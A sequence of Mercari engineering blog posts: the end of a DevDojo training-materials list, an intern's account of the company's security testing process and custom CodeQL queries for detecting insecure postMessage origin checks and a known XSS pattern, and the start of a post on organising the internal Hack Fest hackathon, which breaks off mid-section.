Image search is one of the unique features of Mercari, and is achieved by training an AI to machine-learn vast amounts of data. This lesson goes over the general concepts of machine learning (“ML”) as well as the fundamentals of AI and ML. It also introduces how ML is implemented at Mercari by using actual projects as case studies.

Slide-English

Design System for Mobile

Design systems are something that Mercari is heavily focused on in the interest of providing our users with a sustainable and consistent user experience. In this lesson, we will explain the basics of design systems for mobile, and how we actually create and operate them at Mercari.

Slide-English

Introduction to Mobile Development

Mercari’s mobile development workflow has established rules for release cycles and operational processes in order to improve the user-friendliness and how fast we can release new services. This lesson teaches the development cycle and process actually used in the development of Mercari’s mobile services.

Slide-English

Successful Scrum Team at Mercari

Scrum development, an agile development methodology used at Mercari, is a framework in which small teams of developers work in repeated development cycles over a short period of time. This lesson explains the basic concept of a scrum, the development process at Mercari, and its objectives.

Slide-Japanese / Slide-English

Introduction to Design Doc

This lesson teaches the basics of the design docs (also known as technical specifications) needed for product development and introduces the templates that Mercari is currently using. It also explains how to write a good design doc and how design docs are used at Mercari.

Slide-English

Introduction to Authentification Platform

As a payment platform, Merpay requires authentication and authorization for secure transmission. This lesson goes over the basics of accounts and authentication and AuthN/AuthZ, and gives an overview of the authentication infrastructure used throughout Mercari Group.

Slide-English

KYC in Action

As a payment service provider, Merpay conducts identity verification for users who wish to engage in transactions using the Merpay platform. This lesson explains the basics of KYC, the different types of KYC, and how they are used at Merpay.

Slide-English

Quality Assuarance Policy at Merpay

Quality assurance (“QA”) is essential for being able to sustainably deliver services in a safe, secure, and rapid development cycle. This lesson covers the QA processes, tools, and techniques that we use to quickly identify and resolve problems.

Slide-Japanese /Slide-English

In closing

We will continue to update the DevDojo series so that the training materials can be used not just by Mercari employees, but by the engineering community. Through this program, we hope to contribute to the engineering industry as a whole, both in Japan and overseas.

The content that we are releasing this time is primarily excerpts from full lectures. However, in the future, we would like to release DevDojo’s “hands-on repository”, which contains the actual code used for the hands-on drills that participants use to practice during the program.

Releasing in-house training materials to the public requires a high level of coordination between many different individuals, including those involved in choosing which excerpts to release, editing, branding, content review, and so on. The release of this content was made possible by the cooperation of many Mercari and Merpay engineers, EMs, and team members, and we would like to take a moment to thank them for their contribution to DevDojo!

Lastly, Mercari Group is now actively hiring engineers! If you are at all interested, please don’t hesitate to reach out!

Open position – Engineering at Mercari

The Art of the Security Double Play: How Mercari Combines Internal Audits and Custom CodeQL Queries to Keep Systems Safe

Sun, 14 May 2023 09:00:32 GMT

Abstract

I’m Ahmed Belkahla, and I am currently doing an internship in the Product Security team at Mercari. During my internship, I had the opportunity to work on several exciting projects and gained valuable insights into the strategies and techniques used to safeguard the security of Mercari’s products. In this blog post, I’ll share these approaches in detail. Specifically, we will dive into how we conduct our internal security tests and the different steps we follow. Additionally, I will explain how we seek to improve our Security testing approach and use CodeQL to automate our custom test cases.

Sections:

A comprehensive overview of Mercari’s shift-left approach
Why manual testing falls short: Limitations and possible improvements
Integrating CodeQL to the SDLC: Automating security testing
Maximizing security coverage with CodeQL custom queries
A deep dive into CodeQL query development

A comprehensive overview of Mercari’s shift-left approach

Application security is one of the most crucial pillars of any organization’s security posture as it plays a key role in protecting businesses from data breaches and cyberattacks. At Mercari, ensuring the security of our products is a top priority, and this is why we have a dedicated team for Product Security. To secure our products, we are applying a shift-left security strategy. Addressing security earlier in the development process allows us to ensure that our software is designed with security best practices built in and fix any potential security issues when they are less difficult to address in the initial phases of the SDLC (Software Development Life Cycle). This approach allows us to be more cost, time, and resource efficient.

Now that we’ve gotten the formalities out of the way, let’s dive deeper into the technical details by discussing the first important step in our process! In order to guarantee the implementation of the appropriate controls and defenses for each project and ensure that the corresponding team takes them into consideration, our team typically arranges threat modeling sessions in the initial stages of each project. During these sessions, we analyze and identify possible threats and evaluate their associated risks. Not only does our Product Security team take part in these sessions, but also members from the relevant product actively participate in discussing potential threats. This collaborative effort broadens the security mindset across the company and has proven to be an efficient way of identifying and addressing security risks.
In addition to the threat model we also carry out design reviews and security testing. Testing is essential to ensure that our products meet high security standards, regardless of whether they are intended for public release or internal use. The design review and testing process can be broken down into the following core activities:

Design Review
Web Application Testing
API Testing
Mobile Application Testing (Android/iOS)

To ensure more efficiency, a straightforward and simple process has been implemented for the development and product teams to request design reviews and security testing. They simply need to use our internally developed Slackbot and the Product Security team will receive the request and handle it according to its urgency, priority, and release schedule.

Now that a clear understanding of our approach has been established, let’s take a closer look at how we conduct each activity.

Design Review:

This process involves reviewing the design documents and diagrams for new features, ensuring they don’t contain logic flaws or overlook critical security considerations. Additionally, we verify that the personally identifiable information (PII) related to our users is handled correctly. To conduct these types of reviews, a thorough understanding of UML (unified modeling language), software design, and flow diagrams is required in order to comprehend the software architecture and functionality. Interestingly enough, I found that some of the seemingly mundane software development lessons I learned in university proved to be quite valuable and aided me in completing these tasks. Furthermore, the Product Security team actively takes part in requirement review sessions during the early stages of project planning.

Web Application Testing:

Once the design review is concluded and approved, we move on to technical testing. This step is crucial to ensure the security of the actual implementation, to identify and to address any potential vulnerabilities.
In this section, we will focus on front-end and business-related vulnerabilities before delving into back-end-related flaws in the next section. At Mercari, we make extensive use of React JS as our front-end framework, which effectively mitigates most client-side attack vectors. Nevertheless, we remain vigilant and conduct thorough testing to prevent any possible misuse that could lead to malicious exploitation. As an example, let’s examine a recently released feature that I had the opportunity to work on, and explore some of the test cases that we have carefully examined.

The use of dangerouslySetInnerHTML attribute: As its name suggests, this attribute is similar to innerHTML and allows developers to directly set HTML code to elements, bypassing React’s default sanitization process. This is usually the first sink we check, but luckily it’s rarely/never used by our developers.
Fetch Diversion issues: This might seem new for some readers since this type of attack is not widely known and made its appearance lately.
It mainly consists of injections in the path segment of the API’s URL, which usually occurs when the client side code tries to retrieve some data from the API using GET requests without any proper sanitization. More information about this attack can be found in the following article.
Unsafe postMessage communication: The window.postMessage function is usually used to allow cross-origin or different windows/iframes communication.
In this case, checking the origin of different event messages is important since insufficient controls can lead to some flaws. This may be more impactful when dangerous JS functions or sensitive actions are used with the data received through the messages.
Possible JS injections or unsafe usage of dangerous functions: We always make sure that user input is sanitized and doesn’t end up in a sensitive function (eval, setTimeout, etc.).

Even though some of these checks are automatically done by some of CodeQL default queries, manual checks need to be added to circumvent some limitations.

These were some of the front-end audit test cases we perform on our web applications.
Now, let’s delve into the business-related test cases, where we assess the potential logic vulnerabilities that may exist within Mercari products and issues that might violate our internal guidelines.
Mercari operates across a broad variety of industries (fintech, e-commerce, blockchain, etc.) which allowed me to gain exposure to a variety of areas where security is critical to the business. For instance, in the Mercari C2C marketplace and Merpay mobile payment services, sensitive actions necessitate verification through a passcode that is set up using a custom flow. The classification of sensitive information may vary across our services as such it is crucial to consider all these factors during security tests.

API Testing:

This section focuses on the testing of API endpoints, which are used by both our web and mobile applications. Here, we perform a thorough check for the OWASP API security top 10 vulnerabilities and examine any business-related threats that may be specific to our services.

These are some examples of the main threat scenarios we focused on in a recent test we performed:

Information disclosure to 3rd party: Here we check for any sensitive information that may be disclosed to third parties, as we prioritize protecting the privacy of our users and not unintentionally exposing Personally Identifiable Information (PII).
Authentication and authorization: We test for possible Insecure Direct Object Reference (IDOR) vulnerabilities that could allow for information leakage or unauthorized actions on behalf of other users. Additionally, this section covers passcode verification, rate limiting, OTP verification as well as other authorization issues.
Token Management: Our test includes a critical evaluation of token management, testing for possible token leaks and ensuring proper token revocation and timeout management.

Overall, each of these test cases requires careful consideration of potential edge cases that could result in unexpected or harmful behaviors.

Mobile Application Testing ( Android/iOS )

To wrap up our discussion on our pre-release Security testing areas, we’ll cover how we conduct mobile application testing. And what better way to illustrate our approach than by sharing a recent project we worked on. In fact, we recently had the opportunity to work on a security test related to the implementation of FIDO passkey support in our marketplace application, which we are gradually expanding to other services. This initiative was announced last month in a press release which you can read more about here. In the following section, we will use this test as an example to shed light on our mobile application testing process.

What are FIDO Passkeys ?

The FIDO Alliance defines passkeys as follows:

"Passkeys are a replacement for passwords that provide faster, easier, and more secure sign-ins to websites and apps across a user’s devices. Unlike passwords, passkeys are always strong and phishing-resistant."

Source: https://fidoalliance.org/passkeys/

FIDO Passkeys are a type of credential that offers more flexibility and security than traditional single-device credentials. Passkeys are stored in the platform’s cloud keychain, such as the iCloud Keychain or Google Password Manager. This storage enables users to access their accounts from multiple devices signed in to the same account. The introduction of FIDO Passkeys is motivated by the need to mitigate phishing risks on second key registration and the loss of account access with single-device credentials.

FIDO Passkeys use public/private key cryptography to provide secure authentication. When a user logs in with a Passkey, the RP (Relying Party) sends a challenge and the user retrieves the private key using their biometric information. The user then signs the response and sends it back to the RP, who verifies it using the public key. The private key is stored solely on the device belonging to the user and synchronized with the cloud keychain of the platform provider, while the relying party (RP) solely retains the public key.

Each Passkey is classified with the application package name, which helps to ensure that only the intended application can use the Passkey. This provides an additional layer of security for Passkey authentication.

Image Source: ThalesGroup

Threat scenarios:

I got exposed to passkeys for the first time during my internship so I had to familiarize myself with the flow and the design diagrams of the implementation before jumping into the test. In addition to scrutinizing the typical mobile security vulnerabilities, such as insecure data storage, cryptographic APIs and other tests from OWASP MASTG, we had to put in extra effort and brainstorm possible edge cases that could lead to unforeseen outcomes. Throughout the audit, we tested a variety of scenarios, some of which included the following:

Register a passkey with one platform account then switch the platform account and try to use it.
Try to delete an existing passkey and replace it with a passkey linked to a different passkey account.
Log in to the same account on a different device with a different platform account, and try to use passkey.
Check if one can approve his/her own passkey when adding a second passkey to the same account.
Delete an already approved passkey from an unapproved device.
Approve another passkey from an unapproved device
Delete a passkey using its keyId from another account (IDOR)

In conclusion, the security of our products is of utmost importance to us at Mercari. We take a comprehensive approach to identifying and addressing potential vulnerabilities and security flaws through design reviews, web application testing, API testing, and mobile application testing. By following this process, we strive to ensure that our products are safe and secure for our users.

Why manual testing falls short: Limitations and possible improvements

In the previous section, we presented the overall process for manually testing a new feature within Mercari. The primary aspect that stands out is how we ensure our presence in every part of the development cycle. However, this level of involvement comes at a cost: conducting these tests and checks is a time-intensive process for our Product Security team. With the number of projects that we work on at Mercari, it can be challenging to keep track of all of them. Therefore, we may find ourselves obliged to prioritize certain products or only focus on critical functionalities.

In addition, the time frame for releasing certain features may be tight, and the amount of time available to address any vulnerabilities found during testing may be limited.

As a result, the Product Security team may feel pressure to align their efforts with the product release schedule. Mercari also has a massive codebase which makes it a daunting task for security engineers to thoroughly review and cover all of its components.

Finally, as with all manual tests, there’s always a possibility of overlooking some vulnerabilities, even the most meticulous among us can occasionally miss the mark. We’re only human after all, but don’t worry, we’re doing our best to keep up with our robot overlords!

As previously mentioned, it is important to address the limitations and difficulties we face during manual testing by considering possible solutions and improvements.
One solution that we have implemented is the integration of automated security testing tools into our CI/CD pipeline. By identifying the most common vulnerabilities through automated testing, our developers and security engineers can investigate and address these flaws before manual testing. This approach helps to reduce the number of viable attacks and save time.
The most important tools we use are:

NowSecure: An automated dynamic mobile app security testing solution that performs SAST (Static Application Security Testing) and DAST (Dynamic Application Security Testing) and can be easily integrated into CI/CD pipelines.
Burp Suite Entreprise: As the enterprise version of the well-known product by Portswigger, Burp Suite Enterprise allows running security tests on web applications and visualizing them on the Burp Enterprise dashboard. Moreover, it can be seamlessly integrated into the CI/CD pipeline, you can refer to the Portswigger documentation for more information.
Mend: A Software Composition Analysis (SCA) tool we use to detect vulnerable open source dependencies and comply with license policies. It’s also integrated into our CI/CD pipeline and has a separate dashboard to track the alerts.
CodeQL: An advanced static analysis tool utilized for comprehensive code analysis and vulnerability detection. It enables us to identify security vulnerabilities, coding errors, and quality issues in our codebase.

We will focus on CodeQL as the primary solution in this blog post. CodeQL is a powerful semantic code analysis engine that enables querying code as if it were data, automating security checks and variant analysis by modeling security vulnerabilities as queries. One of the most significant advantages of CodeQL is its ability to integrate with GitHub Advanced Security (GHAS) and GitHub workflows with ease. At Mercari, we primarily use CodeQL as our SAST solution in GitHub code scanning, and it has greatly improved the productivity of our developers by reducing false positives and allowing for efficient visualization and triage of alerts.

The details about the process of integrating CodeQL into our SDLC have already been well-explained in a blog post by my mentor, @Eli.

I would also like to mention that, alongside automated testing, it is worth noting that our organized threat modeling sessions and security champion program play a vital role in reducing the need for manual testing by forecasting potential threats and promoting a security-focused mindset among our developers.

Integrating CodeQL to the SDLC: Automating security testing

In this section we will talk about how CodeQL is integrated into our Secure Systems Development Lifecycle (SSDLC) and provide more information about this solution.
First of all let’s start by quickly explaining the different phases of SSDLC:

Education: Empowering developers through specialized training sessions on writing secure code and promoting a security-focused mindset through internal training programs such as Security Champion.
Planning/Requirements: The planning phase is where the project or product requirements are identified and defined by project managers.
Design: Based on the requirements identified in the planning phase, engineers will create design documents to realize the product or new features.
Development: In this phase, engineers write code for the product or new features, and use GitHub for collaboration, along with CI/CD tools for deployment.
Testing: After development, the QA and security teams test the application, identify bugs and vulnerabilities, which are reported to the development team for fixing, and the product is released once all issues are resolved.
Deployment: Once testing is completed, the decision to deploy the product to the production environment is made.
Maintenance: Engineers continue to maintain the product, adding new features and making improvements to the code.
Retirement: Ensuring secure decommissioning of systems and associated assets in compliance with established protocols and regulatory requirements

We will focus on the Development and Testing phases where we are using GitHub Advanced Security, which is a market leading solution, offering exceptional features such as secret scanning to detect hardcoded keys or tokens, and code scanning that scans the code for vulnerabilities and facilitates the triage. Code scanning can be configured to utilize either CodeQL or a third-party tool.

Next, we will discuss how to integrate CodeQL into a project and set up automated security scanning using GitHub’s built-in features. To access the code scanning feature in private repositories, you will need to have a license for GitHub Advanced Security.

Integrating CodeQL into your project is a straightforward process, you have to navigate to the Security tab in your repository, then simply visit the code scanning alerts page and follow the easy steps provided by GitHub. This will generate a new workflow using a template comparable to the one below, which is set to run a CodeQL scan automatically on push and pull requests to the master branch.

name: "CodeQL"

on:
  push:
    branches: [ "master" ]
  pull_request:
    # The branches below must be a subset of the branches above
    branches: [ "master" ]
  schedule:
    - cron: '40 7 * * 3'

jobs:
  analyze:
    name: Analyze
    runs-on: ${{ (matrix.language == 'swift' && 'macos-latest') || 'ubuntu-latest' }}
    permissions:
      actions: read
      contents: read
      security-events: write

    strategy:
      fail-fast: false
      matrix:
        language: [ 'go' ]

    steps:
    - name: Checkout repository
      uses: actions/checkout@v3

    # Initializes the CodeQL tools for scanning.
    - name: Initialize CodeQL
      uses: github/codeql-action/init@v2
      with:
        languages: ${{ matrix.language }}
    - name: Autobuild
      uses: github/codeql-action/autobuild@v2

    - name: Perform CodeQL Analysis
      uses: github/codeql-action/analyze@v2
      with:
        category: "/language:${{matrix.language}}"

As we continue to explore the capabilities of CodeQL, it’s worth noting that you can easily customize the workflow to fit your specific needs and programming language. In fact, you can even run multiple analyses in parallel if you specify many programming languages in the language matrix. To further customize the analysis, you can also add custom CodeQL queries or packs to the workflow by adding the following parameters in the "Initialize CodeQL" stage.

packs to install one or more CodeQL query packs and run the default query suite or queries for those packs.
queries to specify a single .ql file, a directory containing multiple .ql files, a .qls query suite definition file, or any combination.

This will come in handy as we delve deeper into the topic in the following sections. For more information about CodeQL integration and possible customizations you can visit GitHub’s official documentation.

At Mercari, we use Golang and Typescript extensively and have CodeQL integrated into most of our repositories, thus, CodeQL has become an essential tool in our toolbox.
We also make sure to frequently review the generated alerts and eliminate the false positives to keep track of the security posture of our repositories.

Maximizing security coverage with CodeQL custom queries

At Mercari, we are always striving to improve our security testing process and stay ahead of new vulnerabilities that emerge in the industry. In this section, we will explore how we are extending and enhancing CodeQL’s capabilities to achieve these goals.

Implementing Mercari-Specific Test Cases:

One of the ways we are leveraging CodeQL is by implementing Mercari-specific test cases. By doing this, we can ensure that our applications are not only secure but also meet the specific requirements of our organization. This approach allows us to identify potential security threats that are unique to our systems and address them accordingly.

Improving Inaccurate Default Query Implementations:

While CodeQL’s default query pack provides a solid foundation for vulnerability detection, we found that some default query implementations can be inaccurate. We will present an example in the next section to demonstrate this case. To address this issue, we started working on improving the default query pack whenever we discover any potential flaws, to increase its effectiveness in detecting vulnerabilities.

Tackling New Rising Vulnerabilities Every Day:

As new vulnerabilities emerge every day, we need to ensure that our applications are protected against them so whenever a significant new vulnerability appears, we add our own checks to CodeQL. Additionally, even though the community is constantly contributing with new interesting queries, it takes some time before they are merged to the default query pack.

Reviewing Large Codebases for Specific Vulnerable Patterns or CVEs:

We have a large codebase at Mercari, which can make it challenging to identify and address vulnerabilities effectively. To streamline this process, we experimented with developing specific queries that can identify vulnerable patterns or CVEs across our codebase.

Next, we will discuss some of our goals related to CodeQL and how we plan to achieve them.

Reducing Manual Testing Time:

Manual testing can be time-consuming and often requires significant resources. By using CodeQL, we can automate many of our testing processes, reducing the amount of manual testing required. This approach saves time and allows us to focus on other critical security tasks.

Extending the Vulnerability Detection Capabilities:

We are also extending CodeQL’s vulnerability detection capabilities by improving and extending the default query pack. Additionally, we are providing more detailed output and warnings, which allows developers to independently investigate and verify alerts.

Writing a Query Every Time We Find a New Vulnerability in a Security Test:

Finally, we aim to use CodeQL as an equivalent way of pre-release security testing. Whenever we find a new vulnerability in a security test, we write a new query to detect it. Our ultimate goal is to have the Product Security team retire from routine work to focus on more interesting projects, while CodeQL will take the security testing task automatically.

A deep dive into CodeQL queries development

In this final section, I will list some examples of custom CodeQL queries we developed to show the overall thought process. Resources about CodeQL are still not popular so you will always end up going through the official documentation which is a good reflex you can gain from CTFs.
While some general templates for Taint Tracking or other CodeQL features can be useful, getting familiar with each language’s libraries and logic still requires time.
A great way to start is by practicing with the GitHub CodeQL CTF and studying pre-built queries in the default pack. Understanding concepts such as Abstract Syntax, Data Flow, and Control Flow is crucial to writing effective CodeQL queries. It’s also important to think about identifying the sources and sinks of the vulnerabilities you’re trying to implement. Enough talk, let’s dive into the exciting part!

Example 1: PostMessage Origin check query

One of the already implemented queries in CodeQL is the PostMessage Origin check which detects if the origin of the incoming event messages is checked securely. However, upon review, we found that the query includes some caveats that could create a false sense of security by not reporting some edge cases that could be exploited by attackers. To address this issue, we decided to refactor the original query and add additional checks with more verbose output.
The original query implemented the following checks:

This CodeQL snippet basically considers checks that are done with startsWith and includes functions as secure which is not the case as shown below:

However, we made some changes to the original query to make it more verbose on detecting more edge cases. The following is the most important function in the new query:

string verboseOut(PostMessageHandler handler) {
  // window.origin == event.origin 
  if
    exists(EqualityTest test | sourceOrOrigin(handler).flowsToExpr(test.getAnOperand()) and 
windowOrigin(DataFlow::TypeTracker::end()).flowsToExpr(test.getAnOperand()) )
  or
  // "safeOrigin.includes(event.origin)" 
    exists(InclusionTest test | sourceOrOrigin(handler).flowsTo(test.getContainedNode()))
  or
  // "safeOrigin".startsWith(event.origin)
    exists(StringOps::StartsWith starts |
  origin(DataFlow::TypeTracker::end(), handler).flowsTo(starts.getSubstring())
  )
  or
  // Regex Expression tests
    exists(StringOps::RegExpTest regex |
  origin(DataFlow::TypeTracker::end(), handler).flowsTo(regex.getStringOperand())
  )
  or
  // "safeOrigin".search(event.origin)
    exists(DataFlow::CallNode fct| fct.getCalleeName()="search" and origin(DataFlow::TypeTracker::end(), 
  handler).flowsTo(fct.getReceiver()) )
  or
  // "safeOrigin".indexOf(event.origin)
    exists(DataFlow::CallNode fct| fct.getCalleeName()="indexOf" and origin(DataFlow::TypeTracker::end(), 
  handler).flowsTo(fct.getReceiver()) )

  then 
    result="Postmessage handler's origin check can be bypassed and is using an unsafe function"
  else if not hasOriginCheck(handler) then 
    result="Postmessage handler has no origin check"
  else 
    result=""
}

In the updated query, edge cases are given due consideration, and a warning message is displayed in case an unsafe function is detected so that the security engineer or developer could investigate.

To have a better understanding of CodeQL syntax, let’s examine the following code snippet that detects the usage of startsWith function:

exists(StringOps::StartsWith starts |
origin(DataFlow::TypeTracker::end(), handler).flowsTo(starts.getSubstring())

In this case, we utilize the exists quantifier in CodeQL to encapsulate our logic. The exists syntax, generally written as exists(<variable declarations> | <formula>), evaluates to true if there is at least one combination of values for the variables that satisfy the formula.

Within the formula, we employ the origin predicate (predicates are simply CodeQL functions), which retrieves the reference to .origin from a postMessage event. It returns a DataFlow::SourceNode and relies on DataFlow::TypeTracker to track the value of a given node.

Here’s the definition of the origin predicate:

DataFlow::SourceNode origin(DataFlow::TypeTracker t, PostMessageHandler handler) {
  t.start() and
  result = event(DataFlow::TypeTracker::end(), handler).getAPropertyRead("origin")
  or
  result =
    origin(t.continue(), handler)
        .getAMethodCall([
            "toString", "toLowerCase", "toUpperCase", "toLocaleLowerCase", "toLocaleUpperCase"
          ])
  or
  exists(DataFlow::TypeTracker t2 | result = origin(t2, handler).track(t2, t))
}

To validate if the origin node of the postmessage event flows into the parameter of the startsWith function (we used getSubstring predicate to obtain the value of B in A.startsWith(B)), we utilize the flowsTo predicate. This combination allows us to detect checks performed with the startsWith function and track their flow through the code.

Example 2: react-bootstrap-table unfixed CVE

In addition to improving the accuracy of the default queries, extending the vulnerability detection capabilities of CodeQL can also help tackle specific vulnerabilities in our codebase. For instance, the React-bootstrap-table library used in some of our internal repositories is no longer maintained and contains a known vulnerability CVE-2021-23398. We implemented a custom query in CodeQL that detects the vulnerable pattern and shows a warning. This way, we can proactively identify and remediate such vulnerabilities in our codebase, reducing the risk of security incidents.
To trigger the vulnerability in the React-bootstrap-table library, an invalid React element must be returned through the dataFormat parameter. Therefore, the custom query we implemented focuses on detecting this pattern and providing a warning whenever it is found, as illustrated below.

import javascript
/** Track the data flow from functions that are not returning a React Component to dataFormat attribute*/
class DataFormatFlowConfiguration extends TaintTracking::Configuration {
    DataFormatFlowConfiguration() { this = "DataFormatFlowConfiguration" }

    override predicate isSource(DataFlow::Node source) {
        exists(DataFlow::FunctionNode func| not func.getAReturn().asExpr() instanceof JsxElement and source=func)
    }

    override predicate isSink(DataFlow::Node sink) { 
        exists( JsxAttribute attr| attr.getName()="dataFormat" and attr.getValue()=sink.asExpr())}

}  

from DataFormatFlowConfiguration dataflow, DataFlow::Node source, DataFlow::Node sink
where  dataflow.hasFlow(source, sink)
select "[WARN] If the data used to populate BootstrapTable can be user-controlled, this might be a potential XSS",source

In this CodeQL snippet, we utilize the TaintTracking::Configuration class to perform interprocedural taint tracking analysis. By overriding the isSource and isSink predicates, we define the source and sink points of interest. In this case, our source consists of functions that do not return a React Component. As seen in the CodeQL snippet, we retrieve the return expressions of these functions and check if they are of type JsxElement.

exists(DataFlow::FunctionNode func| not func.getAReturn().asExpr() instanceof JsxElement and source=func)

On the other hand, our sink is represented by the dataFormat attribute. With the help of CodeQL, we can effortlessly track the data flow and identify potential exploitation paths.

Example 3: Detecting race conditions in golang

CodeQL can also be extended to address gaps in its default query library. For example, CodeQL’s default queries currently lack race conditions and time-of-check-to-time-of-use (TOCTOU) vulnerabilities implementation in Golang.

To fill this gap, we are working on implementing a query that can detect these types of vulnerabilities and enable developers to address them proactively.

However, at the time of writing the blogpost, we are still working on this query but likely we will make all our custom queries publicly available once we finish testing them internally.

These examples illustrate some of the custom queries we have developed at Mercari to improve our pre-release security testing.

Conclusion

In conclusion, security testing is an essential part of any software development process. We’ve discussed the challenges of manual testing and the different threat scenarios we focus on in our internal tests and how code scanning with CodeQL can streamline the process. We’ve explored the benefits of using CodeQL and how we, at Mercari, have integrated it into our workflow to detect vulnerabilities, triage them, and reduce false positives.
We have also shown how CodeQL can be customized to meet specific needs, and extended with custom queries to detect and prevent specific vulnerabilities.
If you’re passionate about security and want to work with cutting-edge technologies like CodeQL, we’re hiring! Come join us and be a part of a dynamic team!

Future Improvements

As with any system, there is always room for improvement in the realm of security testing. In this spirit of continuous progress, let’s take a look at some areas where we can enhance our vulnerability detection process:

In comparison to other solutions such as semgrep, CodeQL is known to have a steeper learning curve when it comes to writing queries. However, once mastered, CodeQL provides a more in-depth analysis and better detection of vulnerabilities. We may need to investigate if we can also implement semgrep to get the best of both worlds.
Some threat scenarios can’t be implemented in CodeQL, including those related to some external configuration or vulnerabilities that need dynamic testing. it would be effective if we could figure out how to automate these in the future.
Create a more streamlined process for developers to verify and respond to CodeQL alerts, to make it easier to handle the volume of information generated by the tool.

Final Thoughts

Overall, my internship at Mercari has been an incredibly fruitful experience, I got the chance to work with top-tier security engineers and observe how they are always thinking about new exciting projects. I thoroughly enjoyed the Mercari culture and appreciated the shared mission of safeguarding our assets and continuously enhancing our security posture, all while fostering an enjoyable work environment.

I’m grateful for the trust and support my colleagues have given me and for the chance to participate in making an impact on the company’s security practices.

I’m always grateful for CTF competitions where I sharpened my security skills, but this time, I had the privilege to work with a great mentor, @Eli, who taught me invaluable lessons and helped me grow as a security engineer. While CTFs are an excellent way to learn about security, there’s no substitute for real-world experience and working with proficient mentors. I’m grateful to have had the opportunity to work with @Eli and the Product Security team and gain more practical knowledge that I wouldn’t have been able to learn in a competition.

I look forward to applying what I’ve learned here to my future endeavors, and I’m excited to see how Mercari continues to evolve and innovate in the years to come.

Organizing a Successful Internal Hackathon: Mercari Hack Fest Spring 2023

Mon, 17 Apr 2023 16:00:22 GMT

Hello! I am afroscript from the Mercari Engineering Office.

Since September 2019, Mercari has been regularly organizing a biannual internal technology festival for its engineers called “Hack Fest.”

We are currently in the process of preparing the 7th Hack Fest, which will take place from April 19 to April 21, 2023.

We have been gradually updating the Hack Fest with each iteration. This time, I will introduce what this event entails at its current stage.

I hope that this article can serve as a useful reference for those who are currently organizing or planning similar internal events.

What is Hack Fest?

Hack Fest is a Technology Festival based on the concept of “Unlimited Hacktivity” aimed at fostering innovation that may not be possible within the constraints of “normal work”. By taking a break from routine tasks and dedicating a certain period of time to this event, engineers can concentrate on expanding their skills, or generating ideas that they may not have considered before.

As part of the preparations for the upcoming Hack Fest, we have decided to revamp the event"s logo and key visuals in order to infuse a more celebratory vibe. You may have noticed the thumbnail image of this article features the new key visual that our creative team has crafted to be both cute and stylish.

Why We Hold Hack Fest？

Hack Fest can be a powerful tool to foster creativity, encouraging teamwork and promoting out-of-the-box thinking for companies and organizations. The impact of such events can be seen in terms of three aspects: impact on the product, impact on the organization, and impact on the outside of the organization. We can identify five expected effects of holding Hack Fest by considering these three aspects.

1.Impact on the Product : Creation of new ideas that innovate products
- During Hack Fest, participants generate ideas can explore new possibilities that may not have been previously considered, and develop prototypes to bring these ideas to life.
2-1 Impact on the organization : Increased motivation to work at Mercari
- participants in Hack Fests can develop new skills and uncover untapped potential for the products they work on by examining ideas and outputs from diverse perspectives and collaborating with colleagues who have different areas of expertise. This exposure to different perspectives and experiences can help foster a culture of diversity and inclusivity within the company, leading to the growth of a talented and capable workforce. In addition, participating in Hack Fests offers employees the opportunity to connect with their colleagues and develop a deeper understanding of their work, which can serve as a motivation to work more effectively and efficiently at the company.
2-2 Impact on the organization : Providing opportunities to improve skills
- Hack Fest offers participants the chance to broaden their horizons by taking charge of projects from ideation to execution. This opportunity to take ownership of the entire process, from "what" needs to be done to "how" it should be accomplished, can help to foster an engineer-driven culture. In many organizations, product managers are responsible for determining "what" needs to be done, while engineers are responsible for figuring out "how" to accomplish it. By empowering engineers to take charge of both aspects, Hack Fest can help to break down silos and promote collaboration between different teams within the organization.
- Participating in Hack Fest provides an opportunity for participants to strengthen and expand their expertise by exploring and experimenting with technologies and approaches that they may not use in their daily work. This can help to break down barriers between different areas of the organization and promote the idea that "everyone is a software engineer." By expanding their knowledge and skills, participants can also bring new insights and perspectives back to their daily work, driving innovation and improvement throughout the organization.
2-3 Impact on the organization : Increased expectations for engineering possibilities
- Participating in a Hack Fest can be a tremendous opportunity for companies to tap into the full potential of their engineers and foster a culture of innovation and excellence. By encouraging participants to explore new technologies, experiment with different approaches, and collaborate with colleagues across the organization, companies can help to build a foundation as a tech company and enhance their reputation as a leader in their field. In doing so, they can attract top talent, inspire their workforce, and drive growth and success in the long term.
3.Impact on outside the organization : Contributing to branding as a tech company
- Another important impact of Hack Fest is its potential to contribute to a company’s branding and reputation.

In addition, we believe that the five effects above will contribute to the long-term growth and success of both the products and companies.

Flow of Hack Fest

The general flow of the event is team building -> exploring ideas -> entry -> development -> output. I will explain each stage in detail;

Team Building

Participants can join Hack Fest both as individuals or teams

There are two ways of participating as a team. One way is to “build your own team”, and the other is to join a team by applying for a “shuffle team”

Participants can browse the Idea board (a worksheet where Hackfest participants write the detailed contents of their projects) to find and join existing teams in need of additional members.

Idea Board Example. In the “Recruiting Info” table located on the right side, people can easily check if a team is actively recruiting.

In addition, there is a system called "Shuffle Team", where 3 to 5 members are randomly selected to form a team and participate in Hack Fest. This system provides an opportunity to collaborate with individuals outside of your regular team, fostering knowledge exchange and creating a chance for teams to learn from one another. We introduced this system in our last event, with the aim of promoting cross-team collaboration and knowledge sharing.

Exploring ideas, entry

To participate in the Hack Fest, you need to fill out the idea board shown above. Each team is free to decide what to work on.

Each project should fall into one of these three categories: "things related to the product", "things related to refactoring and rearchitecturing of the system and development environment", and "things related to improving one"s own skills".

Things related to the product
- Development of new features and services for Mercari and Merpay, as well as new apps/services related to Mercari that are not part of regular work. These projects offer a chance for innovative ideas to be explored and developed, and can potentially lead to new business opportunities for the company
Things related to refactoring and rearchitecturing of the system and development environment
- Improvement/new development of internal tool and internal dashboard
- Things that increase maintainability, developer experience, and productivity
- Responding to security issues
- Projects to reduce the complexity of the system
- Remove unnecessary things (code, feature, repository, service,…)
- Creating tools that promote refactoring
- Creating guidelines to remove unnecessary things
- Projects contributing to FinOps
Things related to improving one"s own skills
- Learning new/unusually used technology and development using that technology

We collaborated with the Customer Success Team to create a dedicated Voice of Customer (VOC) page on our internal Hack Fest portal site. This page serves as a valuable resource for product-related inspiration and collects customer requests that are particularly relevant to Hack Fest. By incorporating customer feedback into the event, we aim to develop innovative solutions that meet the needs of our users and drive the continued growth of our platform.

We believe that Hack Fest can provide an opportunity to further enhance our customer-centric approach within the company, such as realizing customer requests that have not been addressed in our day-to-day operations, and finding solutions to customer challenges that have not yet been resolved. By incorporating these customer needs into the event, we aim to strengthen our commitment to customer satisfaction and drive innovation within our organization.

Development & output

